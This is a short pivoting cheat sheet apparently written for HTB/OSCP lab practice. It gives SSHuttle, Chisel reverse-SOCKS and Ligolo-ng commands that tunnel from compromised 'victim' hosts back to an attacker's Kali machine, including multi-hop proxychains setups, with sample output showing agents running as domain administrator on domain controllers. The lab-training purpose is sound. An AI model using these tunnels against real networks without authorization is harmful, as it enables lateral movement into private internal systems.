Pivoting - Cheat Sheet
[
HTB OSCP Pivoting Part 1, pivoting introduction and using SSHuttle
Part 2, pivoting with Chisel
Part 3, pivoting with Ligolo-ng
Pivoting Cheat Sheet, pivoting cheat sheet
SSHuttle
1
sshuttle -r root@<victim> <distant network> -x <victim eth2> --ssh-cmd 'ssh -i id_rsa.key'
Chisel
1
2
3
4
5
6
Make sure to use the same versions, on target and host machines!
# Attacking Box:
./chisel server -p 80 --reverse
# Victim Box (IP is to our Kali Machine):
./chisel.exe client 10.10.14.18:80 R:socks
Place this into /etc/proxychains4.conf:
1
socks5 127.0.0.1 1080
Triple Pivoting (Oh My!)
On Kali:
1
./chisel server -p 80 --reverse
First pivot box:
1
./chisel client 10.10.14.228:80 R:1080:socks
Second pivot box:
1
./chisel client 10.10.14.228:80 R:2080:socks
Third pivot box:
1
./chisel client 10.10.14.228:80 R:3080:socks
Change /etc/proxychains4.conf:
1
2
3
4
5
6
7
8
# Change to Dynamic Chain:
#strict_chain
dynamic_chain
# Add our chisel proxies
socks5 127.0.0.1 3080
socks5 127.0.0.1 2080
socks5 127.0.0.1 1080
Ligolo-ng
To setup ligolo-ng, on Kali:
1
2
3
4
5
6
7
8
9
# This will create a new TUN interface
sudo ip tuntap add user [your_username] mode tun ligolo
# This will set the link on yhe nee interface to up
sudo ip link set ligolo up
# This will add a route to the new tunnel.
# NOTE this is where you insert the new subnet you want to access.
sudo ip route add 172.16.5.0/24 dev ligolo
Once added, we can run the proxy on Kali:
1
./proxy -selfcert
Then, from the Pivot machine, we can run the agent command:
1
./agent -connect 10.10.14.10:11601 -ignore-cert
On our Proxy on Kali, we should see a connection back:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
ligolo-ng » INFO[0024] Agent joined. name="DOMAIN\\Administrator@DC01" remote="10.10.110.3:49821"
We can then run the session and start commands:
ligolo-ng » session
? Specify a session : 1 - DOMAIN\Administrator@DC01 - 10.10.110.3:49821
[Agent : DOMAIN\Administrator@DC01] » start
[Agent : DOMAIN\Administrator@DC01] » INFO[0359] Starting tunnel to CORP\Administrator@DC01
Double Pivoting
Once we have multiple agents, we can quickly change the interaction between which one to use:
1
2
3
4
[Agent : DEV\Administrator@DC02] » session
? Specify a session : [Use arrows to move, type to filter]
> 6 - DOMAIN\Administrator@DC01 - 10.10.110.3:18115
7 - DOMAIN\Administrator@DC02 - 10.10.110.3:33051
HTB OSCP Pivoting